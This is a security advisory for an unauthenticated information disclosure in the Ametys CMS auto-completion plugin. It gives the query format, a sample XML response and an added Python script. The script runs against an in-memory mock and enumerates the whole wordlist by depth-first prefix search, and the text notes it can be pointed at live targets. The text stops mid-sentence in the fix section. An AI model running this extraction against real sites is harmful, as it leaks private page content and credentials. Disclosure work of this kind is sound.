- Title : Ametys CMS - Unauthenticated information disclosure in the auto-completion plugin
- Author : @podalirius_
- CVSS : 5.3 (Medium)
- CVSS Vector :
The auto-completion plugin in Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as
plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages), which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.
The auto-completion plugin in Ametys CMS before 4.5.0 publicly exposes an XML file containing a wordlist (the plugins/web/service/search/auto-completion/domain/en.xml document named above, with en replaced by the code of any other configured language) at the following address:
To query this wordlist, an attacker only needs to send the beginning of a word in the q (query) parameter:
The auto-completion plugin then returns the first 10 matching words starting with adm (the value of the query) as an XML document:
    <?xml version="1.0" encoding="UTF-8"?>
    <auto-completion>
      <item>administrateur</item>
      <item>administrateurs</item>
      <item>administratif</item>
      <item>administratifs</item>
      <item>administration</item>
      <item>administrations</item>
      <item>administrative</item>
      <item>administratives</item>
      <item>administres</item>
      <item>admission</item>
    </auto-completion>
With this in mind, an attacker only needs to perform a depth-first search over prefixes to extract the whole wordlist: each response is capped at 10 items, so a prefix whose response contains fewer than 10 words is exhausted, while a prefix that returns exactly 10 words may hide further matches and must be extended by one more character and queried again.
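The prefix enumeration described above, as an added example that is not part of the original advisory and not Ametys code. The only facts taken from the page are the q parameter, the 10-item cap and the XML response format; the HTTP request is replaced by an in-memory mock (MockAutoCompletion) built from a constructed word list, and the attacker is assumed to know the alphabet of the indexed words (lowercase ASCII here), which is an assumption. To run it against a live target, replace the mock's query method with a function that performs the real request and returns the response body.

```python
"""Prefix-enumeration (depth-first) extraction of a capped auto-completion index.

Added example: the endpoint is simulated in memory; nothing here is the
original advisory's or the vendor's code.
"""
import string
import xml.etree.ElementTree as ET

PAGE_SIZE = 10  # the plugin answers with at most the first 10 matching words

# Constructed sample index standing in for the contents of en.xml.
# The first 10 entries reproduce the response quoted in the advisory; the
# others are invented to show what a single query hides.
SAMPLE_WORDS = [
    "administrateur", "administrateurs", "administratif", "administratifs",
    "administration", "administrations", "administrative", "administratives",
    "administres", "admission",
    "admissions", "admit",          # hidden behind the full "adm" page
    "contact", "j.dupont@example.com", "mot", "motdepasse",
    "password", "secret", "utilisateur",
]


def build_xml(words):
    """Render a response in the <auto-completion><item>..</item></auto-completion> shape."""
    root = ET.Element("auto-completion")
    for w in words:
        ET.SubElement(root, "item").text = w
    return ET.tostring(root, encoding="unicode")


class MockAutoCompletion:
    """Stand-in for the plugin: sorted prefix matches, truncated to PAGE_SIZE."""

    def __init__(self, words):
        self.words = sorted(set(words))

    def query(self, prefix):
        matches = [w for w in self.words if w.startswith(prefix)]
        return build_xml(matches[:PAGE_SIZE])


def parse_items(xml_text):
    """Extract the <item> values from a response body."""
    root = ET.fromstring(xml_text)
    return [item.text for item in root.findall("item")]


def extract_all(fetch, alphabet=string.ascii_lowercase):
    """Depth-first search over prefixes.

    fetch(prefix) must return the XML body for q=prefix.  A page with fewer
    than PAGE_SIZE items means the prefix is exhausted; a full page may hide
    more words, so the prefix is extended by every alphabet character.
    Returns (set of recovered words, number of requests issued).
    """
    found = set()
    queries = 0
    stack = [c for c in reversed(alphabet)]  # pop() yields "a" first
    while stack:
        prefix = stack.pop()
        items = parse_items(fetch(prefix))
        queries += 1
        found.update(items)
        if len(items) == PAGE_SIZE:
            # Full page: descend one character deeper under this prefix.
            stack.extend(prefix + c for c in reversed(alphabet))
    return found, queries


if __name__ == "__main__":
    target = MockAutoCompletion(SAMPLE_WORDS)
    print("single query for 'adm':", parse_items(target.query("adm")))
    words, n = extract_all(target.query)
    print(f"recovered {len(words)} words with {n} requests")
    print(sorted(words))
```

Words containing characters outside the chosen alphabet are still recovered when they sit on a page that is not full (the constructed e-mail address above is found via the single-character prefix j), but a full page whose continuation uses an unlisted character would be pruned; in practice the alphabet is widened with every character observed in responses. The request count grows with the number of full pages, which is what makes this enumeration noisy in the target's access logs.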
To fix this vulnerability, update Ametys CMS to the latest version (